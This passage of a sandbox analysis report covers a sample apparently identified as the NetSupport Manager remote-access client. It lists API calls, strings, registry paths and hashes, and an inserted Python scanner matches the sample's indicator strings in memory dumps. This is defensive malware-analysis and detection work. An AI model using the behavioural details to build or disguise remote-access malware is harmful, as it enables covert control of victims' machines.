                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strtok$Sleep
                                                                                    • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                    • API String ID: 2009458258-3774545468
                                                                                    • Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                    • Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
                                                                                    • Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
                                                                                    • Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742
                                                                                    APIs
                                                                                      • Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11102C6C
                                                                                    • GetThreadDesktop.USER32(00000000), ref: 11102C73
                                                                                    • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
                                                                                    • SetThreadDesktop.USER32(00000000), ref: 11102C90
                                                                                    • CloseDesktop.USER32(00000000), ref: 11102CA9
                                                                                    • GetLastError.KERNEL32 ref: 11102CB1
                                                                                    • CloseDesktop.USER32(00000000), ref: 11102CC7
                                                                                    • GetLastError.KERNEL32 ref: 11102CCF
                                                                                    Strings
                                                                                    • SetThreadDesktop(%s) ok, xrefs: 11102C9B
                                                                                    • OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7
                                                                                    • SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                    • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                    • API String ID: 2036220054-60805735
                                                                                    • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                    • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                    • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                    • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                    APIs
                                                                                    • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                    • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                    • wsprintfA.USER32 ref: 1115E3C8
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                    • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                    • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                    • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                    • API String ID: 1734919802-1728070458
                                                                                    • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                    • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                    • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                    • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • std::exception::exception.LIBCMT ref: 1111013A
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                    • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                    • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                    • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                    • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                    • API String ID: 1976012330-1024648535
                                                                                    • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                    • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                    • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                    • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                    APIs
                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,420B7E12,00000000,?), ref: 1115BA67
                                                                                    • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                    • wsprintfW.USER32 ref: 1115BAA7
                                                                                    • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                    • wsprintfW.USER32 ref: 1115BB67
                                                                                    • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                    • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                    • API String ID: 3050498177-823534439
                                                                                    • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                    • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                    • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                    • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
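The String IDs in the function blocks above (the NSMWndClass/NSMReflect/NSMDropTarget atoms, the ..\ctl32\*.cpp source paths, the *max_sessions and LoadTransports(%d) transport settings, the SetThreadDesktop/OpenDesktop log formats, the root\CIMV2 WMI namespace passed to wsprintfW) and the SOFTWARE\Productive Computer Insight\PCICTL registry path in the block that follows are the raw material a hunter turns into a scanner for process dumps or carved images. The Python below is an added example, not part of this Joe Sandbox report and not NetSupport's or Joe Security's code. The indicator grouping, the "three independent behaviours" threshold and the two sample dumps are this example's own constructions; it assumes the strings sit in the image as plain ASCII or UTF-16LE, which is how the sandbox shows them being passed to the A and W API variants.

```python
import re
from typing import Dict, List, Set

# Indicator strings copied from the String IDs of the function blocks in this
# report, grouped by the behaviour the sandbox attributed to each function.
# The grouping and the detection threshold below are this example's own choice.
NETSUPPORT_INDICATORS: Dict[str, List[str]] = {
    "window_class_atoms": ["NSMWndClass", "NSMReflect", "NSMDropTarget"],
    "build_paths": ["..\\ctl32\\wndclass.cpp", "..\\ctl32\\Refcount.cpp"],
    "transport_config": ["*max_sessions", "LoadTransports(%d)", "UseNCS"],
    "desktop_switch": ["SetThreadDesktop(%s) ok", "OpenDesktop(%s) failed, e=%d"],
    "wmi_query": ["root\\CIMV2", "SELECT * FROM %s"],
    "registry": [
        "SOFTWARE\\Productive Computer Insight\\PCICTL",   # NetSupport-specific
        "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",  # generic, weak signal
    ],
}

MIN_LEN = 6  # shortest printable run treated as a string ("WQL" is too short/generic)
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
# UTF-16LE: a printable byte followed by NUL, repeated (wsprintfW takes wide strings).
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)


def extract_strings(blob: bytes) -> Set[str]:
    """Return the printable ASCII and UTF-16LE strings found in a raw image."""
    found = {m.group().decode("ascii") for m in ASCII_RE.finditer(blob)}
    found |= {m.group().decode("utf-16-le") for m in WIDE_RE.finditer(blob)}
    return found


def scan(blob: bytes) -> Dict[str, List[str]]:
    """Map each indicator category to the indicators present in the blob.

    Substring matching is used because a carved string may carry a prefix or
    suffix (format-string arguments, adjacent data) around the indicator.
    """
    strings = extract_strings(blob)
    hits: Dict[str, List[str]] = {}
    for category, indicators in NETSUPPORT_INDICATORS.items():
        matched = [ind for ind in indicators if any(ind in s for s in strings)]
        if matched:
            hits[category] = matched
    return hits


def verdict(hits: Dict[str, List[str]], min_categories: int = 3) -> bool:
    """True when indicators from at least min_categories distinct behaviours
    co-occur. The CurrentVersion registry path alone is read by countless
    legitimate programs, so a single category never triggers on its own."""
    return len(hits) >= min_categories


def build_sample_dump() -> bytes:
    """Constructed test input (not a real dump): indicator strings from the
    report interleaved with non-printable filler; the WMI namespace is stored
    as UTF-16LE, matching the wsprintfW call the sandbox recorded."""
    filler = bytes(range(0x80, 0xA0))
    parts = [
        filler, b"NSMWndClass\x00", filler, b"..\\ctl32\\wndclass.cpp\x00",
        filler, b"*max_sessions\x00", filler,
        "root\\CIMV2".encode("utf-16-le") + b"\x00\x00", filler,
        b"SOFTWARE\\Productive Computer Insight\\PCICTL\x00", filler,
    ]
    return b"".join(parts)


def build_benign_dump() -> bytes:
    """Constructed input carrying only the generic OS-version registry path."""
    filler = bytes(range(0x80, 0xA0))
    return filler + b"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\x00" + filler


if __name__ == "__main__":
    for name, blob in (("sample", build_sample_dump()), ("benign", build_benign_dump())):
        hits = scan(blob)
        print(f"{name}: netsupport_client={verdict(hits)} categories={sorted(hits)}")
```

Two caveats a practitioner should keep in mind. First, these strings identify the NetSupport Manager client (the Client32 caption in the MessageBoxA call above is the product's own), and NetSupport is also sold as legitimate remote-administration software; the report's verdict rests on context such as the suspicious drop folder and the new RUN key flagged in the signatures, not on the strings alone, so a hit should be paired with those host artifacts before it is acted on. Second, the scanner is deliberately substring-based and tolerant of ASCII/UTF-16LE, but it will miss strings that are stack-built or decrypted only transiently; run it over a post-execution process dump such as the ones listed under Memory Dump Source rather than over the packed file on disk.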
                                                                                    APIs
                                                                                      • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                      • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                    • _memset.LIBCMT ref: 11145485
                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                    • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                    • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                    • API String ID: 4251163631-545709139
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 110150CA
                                                                                    • _memset.LIBCMT ref: 1101510E
                                                                                    • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                    Strings
                                                                                    • PackedCatalogItem, xrefs: 11015132
                                                                                    • NSLSP, xrefs: 11015158
                                                                                    • %012d, xrefs: 110150C4
                                                                                    • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: QueryValue_memsetwsprintf
                                                                                    • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                    • API String ID: 1333399081-1346142259
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 2427920155-3145022300
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                    • API String ID: 3494822531-1878648853
                                                                                    APIs
                                                                                      • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                    • std::exception::exception.LIBCMT ref: 11107414
                                                                                    • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                    • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                    • API String ID: 2851125068-2390547818
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                    • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                    • CoUninitialize.COMBASE ref: 110173D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                    • API String ID: 2407233060-578995875
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                    • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                    • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                    • CoUninitialize.COMBASE ref: 110172E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                    • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                    • API String ID: 2407233060-2037925671
                                                                                    • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                    • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                    • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                    • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                    APIs
                                                                                    Strings
                                                                                    • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                    • DoICFConfig() OK, xrefs: 11138786
                                                                                    • AutoICFConfig, xrefs: 11138700
                                                                                    • Client, xrefs: 11138705
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick
                                                                                    • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                    • API String ID: 536389180-1512301160
                                                                                    • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
